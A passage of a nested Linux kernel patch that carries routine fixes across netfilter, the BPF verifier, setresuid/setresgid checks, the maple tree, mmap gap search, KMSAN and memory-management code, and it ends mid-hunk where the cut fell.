+--- a/include/linux/skbuff.h
++++ b/include/linux/skbuff.h
+@@ -291,6 +291,7 @@ struct nf_bridge_info {
+ 	u8			pkt_otherhost:1;
+ 	u8			in_prerouting:1;
+ 	u8			bridged_dnat:1;
++	u8			sabotage_in_done:1;
+ 	__u16			frag_max_size;
+ 	struct net_device	*physindev;
+ 
+@@ -4687,7 +4688,7 @@ static inline void nf_reset_ct(struct sk_buff *skb)
+ 
+ static inline void nf_reset_trace(struct sk_buff *skb)
+ {
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	skb->nf_trace = 0;
+ #endif
+ }
+@@ -4707,7 +4708,7 @@ static inline void __nf_copy(struct sk_buff *dst, const struct sk_buff *src,
+ 	dst->_nfct = src->_nfct;
+ 	nf_conntrack_get(skb_nfct(src));
+ #endif
+-#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || defined(CONFIG_NF_TABLES)
++#if IS_ENABLED(CONFIG_NETFILTER_XT_TARGET_TRACE) || IS_ENABLED(CONFIG_NF_TABLES)
+ 	if (copy)
+ 		dst->nf_trace = src->nf_trace;
+ #endif
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 9430128aae991..1b8e305bb54ae 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -1085,6 +1085,10 @@ struct nft_chain {
+ };
+ 
+ int nft_chain_validate(const struct nft_ctx *ctx, const struct nft_chain *chain);
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem);
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set);
+ 
+ enum nft_chain_types {
+ 	NFT_CHAIN_T_DEFAULT = 0,
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index 35ecb3118c7d5..111fafe049f7d 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -512,7 +512,7 @@ TRACE_EVENT(f2fs_truncate_partial_nodes,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+-		__field(nid_t,	nid[3])
++		__array(nid_t,	nid, 3)
+ 		__field(int,	depth)
+ 		__field(int,	err)
+ 	),
+diff --git a/init/Kconfig b/init/Kconfig
+index 44e90b28a30f1..42d9771e04b78 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -894,18 +894,14 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-11,12 array-bounds globally.
+-# We may want to target only particular configurations some day.
++# Currently, disable gcc-11+ array-bounds globally.
++# It's still broken in gcc-13, so no upper bound yet.
+ config GCC11_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+-config GCC12_NO_ARRAY_BOUNDS
+-	def_bool y
+-
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
+-	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC_VERSION < 120000 && GCC11_NO_ARRAY_BOUNDS
+-	default y if CC_IS_GCC && GCC_VERSION >= 120000 && GCC_VERSION < 130000 && GCC12_NO_ARRAY_BOUNDS
++	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC11_NO_ARRAY_BOUNDS
+ 
+ #
+ # For architectures that know their GCC __int128 support is sound
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 68455fd56eea5..9db6afc86733b 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -2905,6 +2905,21 @@ static int backtrack_insn(struct bpf_verifier_env *env, int idx,
+ 			}
+ 		} else if (opcode == BPF_EXIT) {
+ 			return -ENOTSUPP;
++		} else if (BPF_SRC(insn->code) == BPF_X) {
++			if (!(*reg_mask & (dreg | sreg)))
++				return 0;
++			/* dreg <cond> sreg
++			 * Both dreg and sreg need precision before
++			 * this insn. If only sreg was marked precise
++			 * before it would be equally necessary to
++			 * propagate it to dreg.
++			 */
++			*reg_mask |= (sreg | dreg);
++			 /* else dreg <cond> K
++			  * Only dreg still needs precision before
++			  * this insn, so for the K-based conditional
++			  * there is nothing new to be marked.
++			  */
+ 		}
+ 	} else if (class == BPF_LD) {
+ 		if (!(*reg_mask & dreg))
+diff --git a/kernel/fork.c b/kernel/fork.c
+index e8808ffbea619..3dea988aec54f 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -1177,6 +1177,7 @@ static struct mm_struct *mm_init(struct mm_struct *mm, struct task_struct *p,
+ fail_pcpu:
+ 	while (i > 0)
+ 		percpu_counter_destroy(&mm->rss_stat[--i]);
++	destroy_context(mm);
+ fail_nocontext:
+ 	mm_free_pgd(mm);
+ fail_nopgd:
+diff --git a/kernel/sys.c b/kernel/sys.c
+index 88b31f096fb2d..c85e1abf7b7c7 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -664,6 +664,7 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	struct cred *new;
+ 	int retval;
+ 	kuid_t kruid, keuid, ksuid;
++	bool ruid_new, euid_new, suid_new;
+ 
+ 	kruid = make_kuid(ns, ruid);
+ 	keuid = make_kuid(ns, euid);
+@@ -678,25 +679,29 @@ long __sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
+ 	if ((suid != (uid_t) -1) && !uid_valid(ksuid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((ruid == (uid_t) -1 || uid_eq(kruid, old->uid)) &&
++	    (euid == (uid_t) -1 || (uid_eq(keuid, old->euid) &&
++				    uid_eq(keuid, old->fsuid))) &&
++	    (suid == (uid_t) -1 || uid_eq(ksuid, old->suid)))
++		return 0;
++
++	ruid_new = ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
++		   !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid);
++	euid_new = euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
++		   !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid);
++	suid_new = suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
++		   !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid);
++	if ((ruid_new || euid_new || suid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETUID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+ 
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETUID)) {
+-		if (ruid != (uid_t) -1        && !uid_eq(kruid, old->uid) &&
+-		    !uid_eq(kruid, old->euid) && !uid_eq(kruid, old->suid))
+-			goto error;
+-		if (euid != (uid_t) -1        && !uid_eq(keuid, old->uid) &&
+-		    !uid_eq(keuid, old->euid) && !uid_eq(keuid, old->suid))
+-			goto error;
+-		if (suid != (uid_t) -1        && !uid_eq(ksuid, old->uid) &&
+-		    !uid_eq(ksuid, old->euid) && !uid_eq(ksuid, old->suid))
+-			goto error;
+-	}
+-
+ 	if (ruid != (uid_t) -1) {
+ 		new->uid = kruid;
+ 		if (!uid_eq(kruid, old->uid)) {
+@@ -761,6 +766,7 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	struct cred *new;
+ 	int retval;
+ 	kgid_t krgid, kegid, ksgid;
++	bool rgid_new, egid_new, sgid_new;
+ 
+ 	krgid = make_kgid(ns, rgid);
+ 	kegid = make_kgid(ns, egid);
+@@ -773,23 +779,28 @@ long __sys_setresgid(gid_t rgid, gid_t egid, gid_t sgid)
+ 	if ((sgid != (gid_t) -1) && !gid_valid(ksgid))
+ 		return -EINVAL;
+ 
++	old = current_cred();
++
++	/* check for no-op */
++	if ((rgid == (gid_t) -1 || gid_eq(krgid, old->gid)) &&
++	    (egid == (gid_t) -1 || (gid_eq(kegid, old->egid) &&
++				    gid_eq(kegid, old->fsgid))) &&
++	    (sgid == (gid_t) -1 || gid_eq(ksgid, old->sgid)))
++		return 0;
++
++	rgid_new = rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
++		   !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid);
++	egid_new = egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
++		   !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid);
++	sgid_new = sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
++		   !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid);
++	if ((rgid_new || egid_new || sgid_new) &&
++	    !ns_capable_setid(old->user_ns, CAP_SETGID))
++		return -EPERM;
++
+ 	new = prepare_creds();
+ 	if (!new)
+ 		return -ENOMEM;
+-	old = current_cred();
+-
+-	retval = -EPERM;
+-	if (!ns_capable_setid(old->user_ns, CAP_SETGID)) {
+-		if (rgid != (gid_t) -1        && !gid_eq(krgid, old->gid) &&
+-		    !gid_eq(krgid, old->egid) && !gid_eq(krgid, old->sgid))
+-			goto error;
+-		if (egid != (gid_t) -1        && !gid_eq(kegid, old->gid) &&
+-		    !gid_eq(kegid, old->egid) && !gid_eq(kegid, old->sgid))
+-			goto error;
+-		if (sgid != (gid_t) -1        && !gid_eq(ksgid, old->gid) &&
+-		    !gid_eq(ksgid, old->egid) && !gid_eq(ksgid, old->sgid))
+-			goto error;
+-	}
+ 
+ 	if (rgid != (gid_t) -1)
+ 		new->gid = krgid;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 022573f499578..7091be30862de 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -1298,26 +1298,21 @@ static inline void mas_alloc_nodes(struct ma_state *mas, gfp_t gfp)
+ 	node = mas->alloc;
+ 	node->request_count = 0;
+ 	while (requested) {
+-		max_req = MAPLE_ALLOC_SLOTS;
+-		if (node->node_count) {
+-			unsigned int offset = node->node_count;
+-
+-			slots = (void **)&node->slot[offset];
+-			max_req -= offset;
+-		} else {
+-			slots = (void **)&node->slot;
+-		}
+-
++		max_req = MAPLE_ALLOC_SLOTS - node->node_count;
++		slots = (void **)&node->slot[node->node_count];
+ 		max_req = min(requested, max_req);
+ 		count = mt_alloc_bulk(gfp, max_req, slots);
+ 		if (!count)
+ 			goto nomem_bulk;
+ 
++		if (node->node_count == 0) {
++			node->slot[0]->node_count = 0;
++			node->slot[0]->request_count = 0;
++		}
++
+ 		node->node_count += count;
+ 		allocated += count;
+ 		node = node->slot[0];
+-		node->node_count = 0;
+-		node->request_count = 0;
+ 		requested -= count;
+ 	}
+ 	mas->alloc->total = allocated;
+@@ -4973,7 +4968,8 @@ not_found:
+  * Return: True if found in a leaf, false otherwise.
+  *
+  */
+-static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
++static bool mas_rev_awalk(struct ma_state *mas, unsigned long size,
++		unsigned long *gap_min, unsigned long *gap_max)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	struct maple_node *node = mas_mn(mas);
+@@ -5038,8 +5034,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
+ 
+ 	if (unlikely(ma_is_leaf(type))) {
+ 		mas->offset = offset;
+-		mas->min = min;
+-		mas->max = min + gap - 1;
++		*gap_min = min;
++		*gap_max = min + gap - 1;
+ 		return true;
+ 	}
+ 
+@@ -5063,10 +5059,10 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ {
+ 	enum maple_type type = mte_node_type(mas->node);
+ 	unsigned long pivot, min, gap = 0;
+-	unsigned char offset;
+-	unsigned long *gaps;
+-	unsigned long *pivots = ma_pivots(mas_mn(mas), type);
+-	void __rcu **slots = ma_slots(mas_mn(mas), type);
++	unsigned char offset, data_end;
++	unsigned long *gaps, *pivots;
++	void __rcu **slots;
++	struct maple_node *node;
+ 	bool found = false;
+ 
+ 	if (ma_is_dense(type)) {
+@@ -5074,13 +5070,15 @@ static inline bool mas_anode_descend(struct ma_state *mas, unsigned long size)
+ 		return true;
+ 	}
+ 
+-	gaps = ma_gaps(mte_to_node(mas->node), type);
++	node = mas_mn(mas);
++	pivots = ma_pivots(node, type);
++	slots = ma_slots(node, type);
++	gaps = ma_gaps(node, type);
+ 	offset = mas->offset;
+ 	min = mas_safe_min(mas, pivots, offset);
+-	for (; offset < mt_slots[type]; offset++) {
+-		pivot = mas_safe_pivot(mas, pivots, offset, type);
+-		if (offset && !pivot)
+-			break;
++	data_end = ma_data_end(node, type, pivots, mas->max);
++	for (; offset <= data_end; offset++) {
++		pivot = mas_logical_pivot(mas, pivots, offset, type);
+ 
+ 		/* Not within lower bounds */
+ 		if (mas->index > pivot)
+@@ -5315,6 +5313,9 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 	unsigned long *pivots;
+ 	enum maple_type mt;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas))
+ 		mas_start(mas);
+ 	else if (mas->offset >= 2)
+@@ -5369,6 +5370,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ {
+ 	struct maple_enode *last = mas->node;
+ 
++	if (min >= max)
++		return -EINVAL;
++
+ 	if (mas_is_start(mas)) {
+ 		mas_start(mas);
+ 		mas->offset = mas_data_end(mas);
+@@ -5388,7 +5392,7 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	mas->index = min;
+ 	mas->last = max;
+ 
+-	while (!mas_rev_awalk(mas, size)) {
++	while (!mas_rev_awalk(mas, size, &min, &max)) {
+ 		if (last == mas->node) {
+ 			if (!mas_rewind_node(mas))
+ 				return -EBUSY;
+@@ -5403,17 +5407,9 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	if (unlikely(mas->offset == MAPLE_NODE_SLOTS))
+ 		return -EBUSY;
+ 
+-	/*
+-	 * mas_rev_awalk() has set mas->min and mas->max to the gap values.  If
+-	 * the maximum is outside the window we are searching, then use the last
+-	 * location in the search.
+-	 * mas->max and mas->min is the range of the gap.
+-	 * mas->index and mas->last are currently set to the search range.
+-	 */
+-
+ 	/* Trim the upper limit to the max. */
+-	if (mas->max <= mas->last)
+-		mas->last = mas->max;
++	if (max <= mas->last)
++		mas->last = max;
+ 
+ 	mas->index = mas->last - size + 1;
+ 	return 0;
+diff --git a/mm/backing-dev.c b/mm/backing-dev.c
+index a53b9360b72ec..30d2d0386fdb9 100644
+--- a/mm/backing-dev.c
++++ b/mm/backing-dev.c
+@@ -507,6 +507,15 @@ static LIST_HEAD(offline_cgwbs);
+ static void cleanup_offline_cgwbs_workfn(struct work_struct *work);
+ static DECLARE_WORK(cleanup_offline_cgwbs_work, cleanup_offline_cgwbs_workfn);
+ 
++static void cgwb_free_rcu(struct rcu_head *rcu_head)
++{
++	struct bdi_writeback *wb = container_of(rcu_head,
++			struct bdi_writeback, rcu);
++
++	percpu_ref_exit(&wb->refcnt);
++	kfree(wb);
++}
++
+ static void cgwb_release_workfn(struct work_struct *work)
+ {
+ 	struct bdi_writeback *wb = container_of(work, struct bdi_writeback,
+@@ -529,11 +538,10 @@ static void cgwb_release_workfn(struct work_struct *work)
+ 	list_del(&wb->offline_node);
+ 	spin_unlock_irq(&cgwb_lock);
+ 
+-	percpu_ref_exit(&wb->refcnt);
+ 	wb_exit(wb);
+ 	bdi_put(bdi);
+ 	WARN_ON_ONCE(!list_empty(&wb->b_attached));
+-	kfree_rcu(wb, rcu);
++	call_rcu(&wb->rcu, cgwb_free_rcu);
+ }
+ 
+ static void cgwb_release(struct percpu_ref *refcnt)
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 7624d22f92278..0c1ab7f7c102e 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -1845,10 +1845,10 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 	if (is_swap_pmd(*pmd)) {
+ 		swp_entry_t entry = pmd_to_swp_entry(*pmd);
+ 		struct page *page = pfn_swap_entry_to_page(entry);
++		pmd_t newpmd;
+ 
+ 		VM_BUG_ON(!is_pmd_migration_entry(*pmd));
+ 		if (is_writable_migration_entry(entry)) {
+-			pmd_t newpmd;
+ 			/*
+ 			 * A protection check is difficult so
+ 			 * just be safe and disable write
+@@ -1862,8 +1862,16 @@ int change_huge_pmd(struct mmu_gather *tlb, struct vm_area_struct *vma,
+ 				newpmd = pmd_swp_mksoft_dirty(newpmd);
+ 			if (pmd_swp_uffd_wp(*pmd))
+ 				newpmd = pmd_swp_mkuffd_wp(newpmd);
+-			set_pmd_at(mm, addr, pmd, newpmd);
++		} else {
++			newpmd = *pmd;
+ 		}
++
++		if (uffd_wp)
++			newpmd = pmd_swp_mkuffd_wp(newpmd);
++		else if (uffd_wp_resolve)
++			newpmd = pmd_swp_clear_uffd_wp(newpmd);
++		if (!pmd_same(*pmd, newpmd))
++			set_pmd_at(mm, addr, pmd, newpmd);
+ 		goto unlock;
+ 	}
+ #endif
+@@ -2666,9 +2674,10 @@ int split_huge_page_to_list(struct page *page, struct list_head *list)
+ 	VM_BUG_ON_FOLIO(!folio_test_large(folio), folio);
+ 
+ 	is_hzp = is_huge_zero_page(&folio->page);
+-	VM_WARN_ON_ONCE_FOLIO(is_hzp, folio);
+-	if (is_hzp)
++	if (is_hzp) {
++		pr_warn_ratelimited("Called split_huge_page for huge zero page\n");
+ 		return -EBUSY;
++	}
+ 
+ 	if (folio_test_writeback(folio))
+ 		return -EBUSY;
+@@ -3252,6 +3261,8 @@ int set_pmd_migration_entry(struct page_vma_mapped_walk *pvmw,
+ 	pmdswp = swp_entry_to_pmd(entry);
+ 	if (pmd_soft_dirty(pmdval))
+ 		pmdswp = pmd_swp_mksoft_dirty(pmdswp);
++	if (pmd_uffd_wp(pmdval))
++		pmdswp = pmd_swp_mkuffd_wp(pmdswp);
+ 	set_pmd_at(mm, address, pvmw->pmd, pmdswp);
+ 	page_remove_rmap(page, vma, true);
+ 	put_page(page);
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index a26a28e3738c1..7380c659e03ae 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -561,6 +561,10 @@ static int __collapse_huge_page_isolate(struct vm_area_struct *vma,
+ 			result = SCAN_PTE_NON_PRESENT;
+ 			goto out;
+ 		}
++		if (pte_uffd_wp(pteval)) {
++			result = SCAN_PTE_UFFD_WP;
++			goto out;
++		}
+ 		page = vm_normal_page(vma, address, pteval);
+ 		if (unlikely(!page) || unlikely(is_zone_device_page(page))) {
+ 			result = SCAN_PAGE_NULL;
+diff --git a/mm/kmsan/hooks.c b/mm/kmsan/hooks.c
+index 3807502766a3e..ec0da72e65aa0 100644
+--- a/mm/kmsan/hooks.c
++++ b/mm/kmsan/hooks.c
+@@ -148,35 +148,74 @@ void kmsan_vunmap_range_noflush(unsigned long start, unsigned long end)
+  * into the virtual memory. If those physical pages already had shadow/origin,
+  * those are ignored.
+  */
+-void kmsan_ioremap_page_range(unsigned long start, unsigned long end,
+-			      phys_addr_t phys_addr, pgprot_t prot,
+-			      unsigned int page_shift)
++int kmsan_ioremap_page_range(unsigned long start, unsigned long end,
++			     phys_addr_t phys_addr, pgprot_t prot,
++			     unsigned int page_shift)
+ {
+ 	gfp_t gfp_mask = GFP_KERNEL | __GFP_ZERO;
+ 	struct page *shadow, *origin;
+ 	unsigned long off = 0;
+-	int nr;
++	int nr, err = 0, clean = 0, mapped;
+ 
+ 	if (!kmsan_enabled || kmsan_in_runtime())
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	kmsan_enter_runtime();
+-	for (int i = 0; i < nr; i++, off += PAGE_SIZE) {
++	for (int i = 0; i < nr; i++, off += PAGE_SIZE, clean = i) {
+ 		shadow = alloc_pages(gfp_mask, 1);
+ 		origin = alloc_pages(gfp_mask, 1);
+-		__vmap_pages_range_noflush(
++		if (!shadow || !origin) {
++			err = -ENOMEM;
++			goto ret;
++		}
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_shadow(start + off),
+ 			vmalloc_shadow(start + off + PAGE_SIZE), prot, &shadow,
+ 			PAGE_SHIFT);
+-		__vmap_pages_range_noflush(
++		if (mapped) {
++			err = mapped;
++			goto ret;
++		}
++		shadow = NULL;
++		mapped = __vmap_pages_range_noflush(
+ 			vmalloc_origin(start + off),
+ 			vmalloc_origin(start + off + PAGE_SIZE), prot, &origin,
+ 			PAGE_SHIFT);
++		if (mapped) {
++			__vunmap_range_noflush(
++				vmalloc_shadow(start + off),
++				vmalloc_shadow(start + off + PAGE_SIZE));
++			err = mapped;
++			goto ret;
++		}
++		origin = NULL;
++	}
++	/* Page mapping loop finished normally, nothing to clean up. */
++	clean = 0;
++
++ret:
++	if (clean > 0) {
++		/*
++		 * Something went wrong. Clean up shadow/origin pages allocated
++		 * on the last loop iteration, then delete mappings created
++		 * during the previous iterations.
++		 */
++		if (shadow)
++			__free_pages(shadow, 1);
++		if (origin)
++			__free_pages(origin, 1);
++		__vunmap_range_noflush(
++			vmalloc_shadow(start),
++			vmalloc_shadow(start + clean * PAGE_SIZE));
++		__vunmap_range_noflush(
++			vmalloc_origin(start),
++			vmalloc_origin(start + clean * PAGE_SIZE));
+ 	}
+ 	flush_cache_vmap(vmalloc_shadow(start), vmalloc_shadow(end));
+ 	flush_cache_vmap(vmalloc_origin(start), vmalloc_origin(end));
+ 	kmsan_leave_runtime();
++	return err;
+ }
+ 
+ void kmsan_iounmap_page_range(unsigned long start, unsigned long end)
+diff --git a/mm/kmsan/shadow.c b/mm/kmsan/shadow.c
+index a787c04e9583c..b8bb95eea5e3d 100644
+--- a/mm/kmsan/shadow.c
++++ b/mm/kmsan/shadow.c
+@@ -216,27 +216,29 @@ void kmsan_free_page(struct page *page, unsigned int order)
+ 	kmsan_leave_runtime();
+ }
+ 
+-void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+-				    pgprot_t prot, struct page **pages,
+-				    unsigned int page_shift)
++int kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
++				   pgprot_t prot, struct page **pages,
++				   unsigned int page_shift)
+ {
+ 	unsigned long shadow_start, origin_start, shadow_end, origin_end;
+ 	struct page **s_pages, **o_pages;
+-	int nr, mapped;
++	int nr, mapped, err = 0;
+ 
+ 	if (!kmsan_enabled)
+-		return;
++		return 0;
+ 
+ 	shadow_start = vmalloc_meta((void *)start, KMSAN_META_SHADOW);
+ 	shadow_end = vmalloc_meta((void *)end, KMSAN_META_SHADOW);
+ 	if (!shadow_start)
+-		return;
++		return 0;
+ 
+ 	nr = (end - start) / PAGE_SIZE;
+ 	s_pages = kcalloc(nr, sizeof(*s_pages), GFP_KERNEL);
+ 	o_pages = kcalloc(nr, sizeof(*o_pages), GFP_KERNEL);
+-	if (!s_pages || !o_pages)
++	if (!s_pages || !o_pages) {
++		err = -ENOMEM;
+ 		goto ret;
++	}
+ 	for (int i = 0; i < nr; i++) {
+ 		s_pages[i] = shadow_page_for(pages[i]);
+ 		o_pages[i] = origin_page_for(pages[i]);
+@@ -249,10 +251,16 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ 	kmsan_enter_runtime();
+ 	mapped = __vmap_pages_range_noflush(shadow_start, shadow_end, prot,
+ 					    s_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	mapped = __vmap_pages_range_noflush(origin_start, origin_end, prot,
+ 					    o_pages, page_shift);
+-	KMSAN_WARN_ON(mapped);
++	if (mapped) {
++		err = mapped;
++		goto ret;
++	}
+ 	kmsan_leave_runtime();
+ 	flush_tlb_kernel_range(shadow_start, shadow_end);
+ 	flush_tlb_kernel_range(origin_start, origin_end);
+@@ -262,6 +270,7 @@ void kmsan_vmap_pages_range_noflush(unsigned long start, unsigned long end,
+ ret:
+ 	kfree(s_pages);
+ 	kfree(o_pages);
++	return err;
+ }
+ 
+ /* Allocate metadata for pages allocated at boot time. */
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 1931da077b2f9..a302f6a709ab2 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1565,7 +1565,8 @@ static inline int accountable_mapping(struct file *file, vm_flags_t vm_flags)
+  */
+ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, low_limit;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 
+@@ -1574,12 +1575,29 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area(&mas, info->low_limit, info->high_limit - 1,
+-				  length))
++	low_limit = info->low_limit;
++retry:
++	if (mas_empty_area(&mas, low_limit, info->high_limit - 1, length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.index;
+ 	gap += (info->align_offset - gap) & info->align_mask;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) < gap + length - 1) {
++			low_limit = tmp->vm_end;
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
++		if (tmp && vm_end_gap(tmp) > gap) {
++			low_limit = vm_end_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
+@@ -1595,7 +1613,8 @@ static unsigned long unmapped_area(struct vm_unmapped_area_info *info)
+  */
+ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ {
+-	unsigned long length, gap;
++	unsigned long length, gap, high_limit, gap_end;
++	struct vm_area_struct *tmp;
+ 
+ 	MA_STATE(mas, &current->mm->mm_mt, 0, 0);
+ 	/* Adjust search length to account for worst case alignment overhead */
+@@ -1603,12 +1622,31 @@ static unsigned long unmapped_area_topdown(struct vm_unmapped_area_info *info)
+ 	if (length < info->length)
+ 		return -ENOMEM;
+ 
+-	if (mas_empty_area_rev(&mas, info->low_limit, info->high_limit - 1,
++	high_limit = info->high_limit;
++retry:
++	if (mas_empty_area_rev(&mas, info->low_limit, high_limit - 1,
+ 				length))
+ 		return -ENOMEM;
+ 
+ 	gap = mas.last + 1 - info->length;
+ 	gap -= (gap - info->align_offset) & info->align_mask;
++	gap_end = mas.last;
++	tmp = mas_next(&mas, ULONG_MAX);
++	if (tmp && (tmp->vm_flags & VM_GROWSDOWN)) { /* Avoid prev check if possible */
++		if (vm_start_gap(tmp) <= gap_end) {
++			high_limit = vm_start_gap(tmp);
++			mas_reset(&mas);
++			goto retry;
++		}
++	} else {
++		tmp = mas_prev(&mas, 0);
++		if (tmp && vm_end_gap(tmp) > gap) {
++			high_limit = tmp->vm_start;
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index dab67b14e178d..9e4b339809141 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -6590,7 +6590,21 @@ static void __build_all_zonelists(void *data)
+ 	int nid;
+ 	int __maybe_unused cpu;
+ 	pg_data_t *self = data;
++	unsigned long flags;
+ 
++	/*
++	 * Explicitly disable this CPU's interrupts before taking seqlock
++	 * to prevent any IRQ handler from calling into the page allocator
++	 * (e.g. GFP_ATOMIC) that could hit zonelist_iter_begin and livelock.
++	 */
++	local_irq_save(flags);
++	/*
++	 * Explicitly disable this CPU's synchronous printk() before taking
++	 * seqlock to prevent any printk() from trying to hold port->lock, for
++	 * tty_insert_flip_string_and_push_buffer() on other CPU might be
++	 * calling kmalloc(GFP_ATOMIC | __GFP_NOWARN) with port->lock held.
++	 */
++	printk_deferred_enter();
+ 	write_seqlock(&zonelist_update_seq);
+ 
+ #ifdef CONFIG_NUMA
+@@ -6629,6 +6643,8 @@ static void __build_all_zonelists(void *data)
+ 	}
+ 
+ 	write_sequnlock(&zonelist_update_seq);
++	printk_deferred_exit();
++	local_irq_restore(flags);
+ }
+ 
+ static noinline void __init
+@@ -9407,6 +9423,9 @@ static bool pfn_range_valid_contig(struct zone *z, unsigned long start_pfn,
+ 
+ 		if (PageReserved(page))
+ 			return false;
++
++		if (PageHuge(page))
++			return false;
+ 	}
+ 	return true;
+ }
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index b2249d01b3a2c..f6b3c8850d15b 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -324,8 +324,8 @@ int ioremap_page_range(unsigned long addr, unsigned long end,
+ 				 ioremap_max_page_shift);
+ 	flush_cache_vmap(addr, end);
+ 	if (!err)
+-		kmsan_ioremap_page_range(addr, end, phys_addr, prot,
+-					 ioremap_max_page_shift);
++		err = kmsan_ioremap_page_range(addr, end, phys_addr, prot,
++					       ioremap_max_page_shift);
+ 	return err;
+ }
+ 
+@@ -616,7 +616,11 @@ int __vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ int vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ 		pgprot_t prot, struct page **pages, unsigned int page_shift)
+ {
+-	kmsan_vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
